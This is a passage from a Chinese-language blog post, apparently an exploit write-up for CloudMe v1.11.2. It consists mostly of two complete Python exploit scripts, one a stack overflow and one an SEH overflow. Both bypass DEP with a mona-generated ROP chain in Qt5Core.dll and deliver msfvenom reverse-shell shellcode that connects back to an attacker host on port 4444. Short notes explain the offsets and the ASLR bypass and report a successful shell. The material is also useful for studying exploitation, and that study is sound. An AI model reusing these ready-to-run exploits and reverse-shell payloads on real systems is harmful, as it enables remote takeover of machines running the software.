class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line">target=<span class="string">"127.0.0.1"</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># msfvenom -p windows/shell_reverse_tcp LHOST=192.168.13.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00'</span></span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">b""</span></span><br><span class="line">shellcode += <span class="string">b"\xb8\x26\xe9\x79\xbf\xdb\xdc\xd9\x74\x24\xf4"</span></span><br><span class="line">shellcode += <span class="string">b"\x5e\x33\xc9\xb1\x52\x31\x46\x12\x83\xee\xfc"</span></span><br><span class="line">shellcode += <span class="string">b"\x03\x60\xe7\x9b\x4a\x90\x1f\xd9\xb5\x68\xe0"</span></span><br><span class="line">shellcode += <span class="string">b"\xbe\x3c\x8d\xd1\xfe\x5b\xc6\x42\xcf\x28\x8a"</span></span><br><span class="line">shellcode += <span class="string">b"\x6e\xa4\x7d\x3e\xe4\xc8\xa9\x31\x4d\x66\x8c"</span></span><br><span class="line">shellcode += <span class="string">b"\x7c\x4e\xdb\xec\x1f\xcc\x26\x21\xff\xed\xe8"</span></span><br><span class="line">shellcode += <span class="string">b"\x34\xfe\x2a\x14\xb4\x52\xe2\x52\x6b\x42\x87"</span></span><br><span class="line">shellcode += <span class="string">b"\x2f\xb0\xe9\xdb\xbe\xb0\x0e\xab\xc1\x91\x81"</span></span><br><span class="line">shellcode += <span class="string">b"\xa7\x9b\x31\x20\x6b\x90\x7b\x3a\x68\x9d\x32"</span></span><br><span class="line">shellcode += <span class="string">b"\xb1\x5a\x69\xc5\x13\x93\x92\x6a\x5a\x1b\x61"</span></span><br><span class="line">shellcode += <span class="string">b"\x72\x9b\x9c\x9a\x01\xd5\xde\x27\x12\x22\x9c"</span></span><br><span class="line">shellcode += <span class="string">b"\xf3\x97\xb0\x06\x77\x0f\x1c\xb6\x54\xd6\xd7"</span></span><br><span class="line">shellcode += <span class="string">b"\xb4\x11\x9c\xbf\xd8\xa4\x71\xb4\xe5\x2d\x74"</span></span><br><span class="line">shellcode += <span class="string">b"\x1a\x6c\x75\x53\xbe\x34\x2d\xfa\xe7\x90\x80"</span></span><br><span class="line">shellcode += <span class="string">b"\x03\xf7\x7a\x7c\xa6\x7c\x96\x69\xdb\xdf\xff"</span></span><br><span class="line">shellcode += <span class="string">b"\x5e\xd6\xdf\xff\xc8\x61\xac\xcd\x57\xda\x3a"</span></span><br><span class="line">shellcode += <span class="string">b"\x7e\x1f\xc4\xbd\x81\x0a\xb0\x51\x7c\xb5\xc1"</span></span><br><span class="line">shellcode += <span class="string">b"\x78\xbb\xe1\x91\x12\x6a\x8a\x79\xe2\x93\x5f"</span></span><br><span class="line">shellcode += <span class="string">b"\x2d\xb2\x3b\x30\x8e\x62\xfc\xe0\x66\x68\xf3"</span></span><br><span class="line">shellcode += <span class="string">b"\xdf\x97\x93\xd9\x77\x3d\x6e\x8a\xb7\x6a\x7d"</span></span><br><span class="line">shellcode += <span class="string">b"\xc3\x50\x69\x7d\xc2\xfc\xe4\x9b\x8e\xec\xa0"</span></span><br><span class="line">shellcode += <span class="string">b"\x34\x27\x94\xe8\xce\xd6\x59\x27\xab\xd9\xd2"</span></span><br><span class="line">shellcode += <span class="string">b"\xc4\x4c\x97\x12\xa0\x5e\x40\xd3\xff\x3c\xc7"</span></span><br><span class="line">shellcode += <span class="string">b"\xec\xd5\x28\x8b\x7f\xb2\xa8\xc2\x63\x6d\xff"</span></span><br><span class="line">shellcode += <span class="string">b"\x83\x52\x64\x95\x39\xcc\xde\x8b\xc3\x88\x19"</span></span><br><span class="line">shellcode += <span class="string">b"\x0f\x18\x69\xa7\x8e\xed\xd5\x83\x80\x2b\xd5"</span></span><br><span class="line">shellcode += <span class="string">b"\x8f\xf4\xe3\x80\x59\xa2\x45\x7b\x28\x1c\x1c"</span></span><br><span class="line">shellcode += <span class="string">b"\xd0\xe2\xc8\xd9\x1a\x35\x8e\xe5\x76\xc3\x6e"</span></span><br><span class="line">shellcode += <span class="string">b"\x57\x2f\x92\x91\x58\xa7\x12\xea\x84\x57\xdc"</span></span><br><span class="line">shellcode += <span class="string">b"\x21\x0d\x77\x3f\xe3\x78\x10\xe6\x66\xc1\x7d"</span></span><br><span class="line">shellcode += <span class="string">b"\x19\x5d\x06\x78\x9a\x57\xf7\x7f\x82\x12\xf2"</span></span><br><span class="line">shellcode += <span class="string">b"\xc4\x04\xcf\x8e\x55\xe1\xef\x3d\x55\x20"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span>:</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line"> rop_gadgets = [</span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ebp:---]</span></span><br><span class="line"> <span class="number">0x68c50d64</span>, <span class="comment"># POP EBP # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68c50d64</span>, <span class="comment"># skip 4 bytes [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ebx:---]</span></span><br><span class="line"> <span class="number">0x68fa7ca2</span>, <span class="comment"># POP EDX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0xfffffdff</span>, <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line"> <span class="number">0x68bd5fe4</span>, <span class="comment"># NEG EDX # RETN 0x0C [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68d773fe</span>, <span class="comment"># POP EBX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0xffffffff</span>, <span class="comment">#</span></span><br><span class="line"> <span class="number">0x68fb3ef1</span>, <span class="comment"># INC EBX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68f8063c</span>, <span class="comment"># ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_edx:---]</span></span><br><span class="line"> <span class="number">0x68f9a472</span>, <span class="comment"># POP EDX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0xffffffc0</span>, <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line"> <span class="number">0x68bd5fe4</span>, <span class="comment"># NEG EDX # RETN 0x0C [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ecx:---]</span></span><br><span class="line"> <span class="number">0x68ae7e17</span>, <span class="comment"># POP ECX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x68c13baa</span>, <span class="comment"># &Writable location [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_edi:---]</span></span><br><span class="line"> <span class="number">0x68c018b6</span>, <span class="comment"># POP EDI # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68cef5b4</span>, <span class="comment"># RETN (ROP NOP) [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_esi:---]</span></span><br><span class="line"> <span class="number">0x68d54786</span>, <span class="comment"># POP ESI # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68a9314e</span>, <span class="comment"># JMP [EAX] [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68b226c5</span>, <span class="comment"># POP EAX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x690398a8</span>, <span class="comment"># ptr to &VirtualProtect() [IAT Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:pushad:---]</span></span><br><span class="line"> <span class="number">0x68fd02fb</span>, <span class="comment"># PUSHAD # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:extras:---]</span></span><br><span class="line"> <span class="number">0x68aa11e6</span>, <span class="comment"># ptr to 'push esp # ret ' [Qt5Core.dll]</span></span><br><span class="line"> ]</span><br><span class="line"> <span class="keyword">return</span> <span class="string">b''</span>.join(struct.pack(<span class="string">'<I'</span>, _) <span class="keyword">for</span> _ <span class="keyword">in</span> rop_gadgets)</span><br><span class="line"></span><br><span class="line">rop_chain = create_rop_chain()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">buff_size = <span class="number">4000</span></span><br><span class="line">junk = <span class="string">b'A'</span>*<span class="number">1052</span></span><br><span class="line">retn = struct.pack(<span class="string">"<L"</span>,<span class="number">0x68c1f01c</span>) <span class="comment"># 0x68c1f01c : retn</span></span><br><span class="line">nops = <span class="string">b"\x90"</span>*<span class="number">32</span></span><br><span class="line">junk2 = <span class="string">b'C'</span>*(buff_size<span class="number">-1052</span>-len(shellcode)<span class="number">-32</span>)</span><br><span class="line">payload = junk+retn+rop_chain+nops+shellcode+junk2</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line"> s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line"> s.connect((target,<span class="number">8888</span>))</span><br><span class="line"> s.send(payload)</span><br><span class="line"><span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> print(e)</span><br></pre></td></tr></table></figure>
<p>利用<code>mona</code>自动生成的<code>ROP Chain</code>,所使用的<code>Qt5Core.dll</code>没有开启<code>ASLR</code>,所以这里采用的选择未开启<code>ASLR</code>的<code>DLL</code>来<code>bypass ASLR</code>。</p>
<p>成功反弹<code>shell</code>:</p>
<p><img src="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/01.png" alt="seh"></p>
<p><strong>SEH栈溢出利用:</strong></p>
<p>触发<code>SEH</code>栈溢出<code>Offset</code>为<code>2348</code>,注意这里是指覆盖<code>Next SEH</code>而不是<code>SEH Handler</code>。按照普通<code>SEH</code>栈溢出漏洞利用,<code>P/P/R</code>配合<code>JMP</code>,来一下出现的问题:</p>
<p><code>P/P/R</code>处下断点,异常发生之后,进入<code>P/P/R</code>:</p>
<p><img src="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/04.png" alt="seh"></p>
<p>想要执行<code>JMP</code>指令,因为<code>DEP</code>的存在,执行失败:</p>
<p><img src="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/05.png" alt="seh"></p>
<p>结合前一篇文章介绍,这里需要一条能够跳转到<code>ROP Chain</code>的指令覆盖<code>SEH Handler</code>,上一篇文章介绍的比较详细,这里给出最后的利用脚本:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span class="line">target=<span class="string">"127.0.0.1"</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># msfvenom -p windows/shell_reverse_tcp LHOST=192.168.13.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00'</span></span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">b""</span></span><br><span class="line">shellcode += <span class="string">b"\xda\xd9\xd9\x74\x24\xf4\xba\xc2\x93\x9a\x62"</span></span><br><span class="line">shellcode += <span class="string">b"\x58\x33\xc9\xb1\x52\x83\xe8\xfc\x31\x50\x13"</span></span><br><span class="line">shellcode += <span class="string">b"\x03\x92\x80\x78\x97\xee\x4f\xfe\x58\x0e\x90"</span></span><br><span class="line">shellcode += <span class="string">b"\x9f\xd1\xeb\xa1\x9f\x86\x78\x91\x2f\xcc\x2c"</span></span><br><span class="line">shellcode += <span class="string">b"\x1e\xdb\x80\xc4\x95\xa9\x0c\xeb\x1e\x07\x6b"</span></span><br><span class="line">shellcode += <span class="string">b"\xc2\x9f\x34\x4f\x45\x1c\x47\x9c\xa5\x1d\x88"</span></span><br><span class="line">shellcode += <span class="string">b"\xd1\xa4\x5a\xf5\x18\xf4\x33\x71\x8e\xe8\x30"</span></span><br><span class="line">shellcode += <span class="string">b"\xcf\x13\x83\x0b\xc1\x13\x70\xdb\xe0\x32\x27"</span></span><br><span class="line">shellcode += <span class="string">b"\x57\xbb\x94\xc6\xb4\xb7\x9c\xd0\xd9\xf2\x57"</span></span><br><span class="line">shellcode += <span class="string">b"\x6b\x29\x88\x69\xbd\x63\x71\xc5\x80\x4b\x80"</span></span><br><span class="line">shellcode += <span class="string">b"\x17\xc5\x6c\x7b\x62\x3f\x8f\x06\x75\x84\xed"</span></span><br><span class="line">shellcode += <span class="string">b"\xdc\xf0\x1e\x55\x96\xa3\xfa\x67\x7b\x35\x89"</span></span><br><span class="line">shellcode += <span class="string">b"\x64\x30\x31\xd5\x68\xc7\x96\x6e\x94\x4c\x19"</span></span><br><span class="line">shellcode += <span class="string">b"\xa0\x1c\x16\x3e\x64\x44\xcc\x5f\x3d\x20\xa3"</span></span><br><span class="line">shellcode += <span class="string">b"\x60\x5d\x8b\x1c\xc5\x16\x26\x48\x74\x75\x2f"</span></span><br><span class="line">shellcode += <span class="string">b"\xbd\xb5\x85\xaf\xa9\xce\xf6\x9d\x76\x65\x90"</span></span><br><span class="line">shellcode += <span class="string">b"\xad\xff\xa3\x67\xd1\xd5\x14\xf7\x2c\xd6\x64"</span></span><br><span class="line">shellcode += <span class="string">b"\xde\xea\x82\x34\x48\xda\xaa\xde\x88\xe3\x7e"</span></span><br><span class="line">shellcode += <span class="string">b"\x70\xd8\x4b\xd1\x31\x88\x2b\x81\xd9\xc2\xa3"</span></span><br><span class="line">shellcode += <span class="string">b"\xfe\xfa\xed\x69\x97\x91\x14\xfa\x58\xcd\x1b"</span></span><br><span class="line">shellcode += <span class="string">b"\x73\x30\x0c\x23\x92\x9d\x99\xc5\xfe\x0d\xcc"</span></span><br><span class="line">shellcode += <span class="string">b"\x5e\x97\xb4\x55\x14\x06\x38\x40\x51\x08\xb2"</span></span><br><span class="line">shellcode += <span class="string">b"\x67\xa6\xc7\x33\x0d\xb4\xb0\xb3\x58\xe6\x17"</span></span><br><span class="line">shellcode += <span class="string">b"\xcb\x76\x8e\xf4\x5e\x1d\x4e\x72\x43\x8a\x19"</span></span><br><span class="line">shellcode += <span class="string">b"\xd3\xb5\xc3\xcf\xc9\xec\x7d\xed\x13\x68\x45"</span></span><br><span class="line">shellcode += <span class="string">b"\xb5\xcf\x49\x48\x34\x9d\xf6\x6e\x26\x5b\xf6"</span></span><br><span class="line">shellcode += <span class="string">b"\x2a\x12\x33\xa1\xe4\xcc\xf5\x1b\x47\xa6\xaf"</span></span><br><span class="line">shellcode += <span class="string">b"\xf0\x01\x2e\x29\x3b\x92\x28\x36\x16\x64\xd4"</span></span><br><span class="line">shellcode += <span class="string">b"\x87\xcf\x31\xeb\x28\x98\xb5\x94\x54\x38\x39"</span></span><br><span class="line">shellcode += <span class="string">b"\x4f\xdd\x58\xd8\x45\x28\xf1\x45\x0c\x91\x9c"</span></span><br><span class="line">shellcode += <span class="string">b"\x75\xfb\xd6\x98\xf5\x09\xa7\x5e\xe5\x78\xa2"</span></span><br><span class="line">shellcode += <span class="string">b"\x1b\xa1\x91\xde\x34\x44\x95\x4d\x34\x4d"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span>:</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line"> rop_gadgets = [</span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ebp:---]</span></span><br><span class="line"> <span class="number">0x68c50d64</span>, <span class="comment"># POP EBP # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># junk</span></span><br><span class="line"> <span class="number">0x68c50d64</span>, <span class="comment"># skip 4 bytes [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ebx:---]</span></span><br><span class="line"> <span class="number">0x68fa7ca2</span>, <span class="comment"># POP EDX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0xfffffdff</span>, <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line"> <span class="number">0x68bd5fe4</span>, <span class="comment"># NEG EDX # RETN 0x0C [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68d773fe</span>, <span class="comment"># POP EBX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0xffffffff</span>, <span class="comment">#</span></span><br><span class="line"> <span class="number">0x68fb3ef1</span>, <span class="comment"># INC EBX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68f8063c</span>, <span class="comment"># ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_edx:---]</span></span><br><span class="line"> <span class="number">0x68f9a472</span>, <span class="comment"># POP EDX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0xffffffc0</span>, <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line"> <span class="number">0x68bd5fe4</span>, <span class="comment"># NEG EDX # RETN 0x0C [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ecx:---]</span></span><br><span class="line"> <span class="number">0x68ae7e17</span>, <span class="comment"># POP ECX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x68c13baa</span>, <span class="comment"># &Writable location [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_edi:---]</span></span><br><span class="line"> <span class="number">0x68c018b6</span>, <span class="comment"># POP EDI # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68cef5b4</span>, <span class="comment"># RETN (ROP NOP) [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_esi:---]</span></span><br><span class="line"> <span class="number">0x68d54786</span>, <span class="comment"># POP ESI # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68a9314e</span>, <span class="comment"># JMP [EAX] [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68b226c5</span>, <span class="comment"># POP EAX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x690398a8</span>, <span class="comment"># ptr to &VirtualProtect() [IAT Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:pushad:---]</span></span><br><span class="line"> <span class="number">0x68fd02fb</span>, <span class="comment"># PUSHAD # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:extras:---]</span></span><br><span class="line"> <span class="number">0x68aa11e6</span>, <span class="comment"># ptr to 'push esp # ret ' [Qt5Core.dll]</span></span><br><span class="line"> ]</span><br><span class="line"> <span class="keyword">return</span> <span class="string">b''</span>.join(struct.pack(<span class="string">'<I'</span>, _) <span class="keyword">for</span> _ <span class="keyword">in</span> rop_gadgets)</span><br><span class="line"></span><br><span class="line">rop_chain = create_rop_chain()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">buff_size = <span class="number">4000</span></span><br><span class="line"><span class="comment">#junk = b'A'*2348</span></span><br><span class="line"><span class="comment">#nseh = b"\xeb\x06\x90\x90"</span></span><br><span class="line">junk = <span class="string">b'A'</span>*<span class="number">2352</span></span><br><span class="line"><span class="comment">#seh = struct.pack("<L",0x68a9528e) #0x68a9528e : pop esi # pop edi # ret</span></span><br><span class="line">seh = struct.pack(<span class="string">"<L"</span>,<span class="number">0x68b72608</span>) <span class="comment">#0x68b72608 : {pivot 4156 / 0x103c} : # ADD ESP,102C # POP EBX # POP ESI # POP EDI # POP EBP # RETN 0x04</span></span><br><span class="line">nops = <span class="string">b"\x90"</span>*<span class="number">32</span></span><br><span class="line">nops2 = <span class="string">b"\x90"</span>*<span class="number">1480</span></span><br><span class="line">junk1 = <span class="string">b"\x41"</span>*<span class="number">16</span> </span><br><span class="line">junk2 = <span class="string">b'C'</span>*(buff_size<span class="number">-2352</span><span class="number">-4</span>-len(shellcode)-len(nops)-len(nops2))</span><br><span class="line"><span class="comment">#payload = junk+nseh+seh+retn+rop_chain+nops+shellcode+junk2</span></span><br><span class="line">payload = junk+seh+nops2+junk1+rop_chain+nops+shellcode+junk2</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line"> s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line"> s.connect((target,<span class="number">8888</span>))</span><br><span class="line"> s.send(payload)</span><br><span class="line"><span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> print(e)</span><br></pre></td></tr></table></figure>
<p>成功反弹<code>shell</code>:</p>
<p><img src="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/01.png" alt="seh"></p>
<p><strong>参考:</strong></p>
<p>1.<a href="https://xen0vas.github.io/cloudme-v1-11-2-dep-bypass-using-rop-gadgets/#" target="_blank" rel="noopener">https://xen0vas.github.io/cloudme-v1-11-2-dep-bypass-using-rop-gadgets/#</a></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>